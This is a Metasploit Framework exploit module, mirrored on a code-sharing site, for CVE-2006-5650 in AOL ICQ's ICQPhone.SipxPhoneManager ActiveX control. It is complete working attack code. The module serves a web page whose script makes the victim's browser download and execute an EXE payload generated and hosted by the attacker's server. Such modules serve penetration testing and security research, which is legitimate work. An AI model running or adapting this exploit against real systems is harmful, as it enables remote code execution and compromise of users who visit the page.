Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/aol_icq_downloadagent.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'America Online ICQ ActiveX Control Arbitrary File Download and Execute',

17
        'Description' => %q{

18
          This module allows remote attackers to download and execute arbitrary files

19
          on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [ 'MC' ],

23
        'References' => [

24
          [ 'CVE', '2006-5650' ],

25
          [ 'OSVDB', '30220' ],

26
          [ 'BID', '20930' ],

27
          [ 'ZDI', '06-037' ],

28
        ],

29
        'Payload' => {

30
          'Space' => 2048,

31
          'StackAdjustment' => -3500,

32
        },

33
        'Platform' => 'win',

34
        'Targets' => [

35
          [ 'Automatic', {} ],

36
        ],

37
        'DisclosureDate' => '2006-11-06',

38
        'DefaultTarget' => 0,

39
        'Notes' => {

40
          'Reliability' => UNKNOWN_RELIABILITY,

41
          'Stability' => UNKNOWN_STABILITY,

42
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

43
        }

44
      )

45
    )

46


47
    register_options(

48
      [

49
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])

50
      ]

51
    )

52
  end

53


54
  def autofilter

55
    false

56
  end

57


58
  def check_dependencies

59
    use_zlib

60
  end

61


62
  def on_request_uri(cli, request)

63
    payload_url = "http://"

64
    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

65
    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"

66


67
    if (request.uri.match(/PAYLOAD/))

68
      return if ((p = regenerate_payload(cli)) == nil)

69


70
      data = generate_payload_exe({ :code => p.encoded })

71
      print_status("Sending EXE payload")

72
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

73
      return

74
    end

75


76
    vname = rand_text_alpha(rand(100) + 1)

77
    exe = rand_text_alpha_upper(rand(5) + 1)

78


79
    content = %Q|

80
  <html>

81
    <head>

82
      <script>

83
        try {

84
          var #{vname} = new ActiveXObject('ICQPhone.SipxPhoneManager.1');

85
          #{vname}.DownloadAgent("#{payload_url}/#{exe}.exe");

86
        } catch( e ) { window.location = 'about:blank' ; }

87
      </script>

88
    </head>

89
  </html>

90
        |

91


92
    print_status("Sending exploit...")

93


94
    send_response_html(cli, content)

95


96
    handler(cli)

97
  end

98
end

99


100